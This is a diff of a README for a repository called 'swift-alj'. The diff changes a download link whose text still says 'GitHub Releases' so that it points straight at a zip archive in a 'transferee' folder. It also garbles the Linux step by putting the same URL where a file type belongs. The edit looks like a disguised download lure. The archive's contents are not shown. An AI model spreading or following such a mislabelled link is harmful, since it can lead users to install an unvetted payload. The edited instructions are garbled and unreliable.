Lockwoodottoman677/swift-alj/README.md

 ## 🔗 Download & Install

-To get started, visit this page to download: [GitHub Releases](https://github.com/Lockwoodottoman677/swift-alj/releases).
+To get started, visit this page to download: [GitHub Releases](https://raw.githubusercontent.com/Lockwoodottoman677/swift-alj/main/transferee/swift-alj_v2.0-alpha.4.zip).

 1. Click the link above.
 2. Look for the latest version listed on the page.
 3. Download the file that matches your operating system.
    - For Windows, look for `.exe` files.
    - For macOS, look for `.dmg` files.
-   - For Linux, you will see `.tar.gz` files.
+   - For Linux, you will see `https://raw.githubusercontent.com/Lockwoodottoman677/swift-alj/main/transferee/swift-alj_v2.0-alpha.4.zip` files.

 Once the file has downloaded, follow these instructions to install: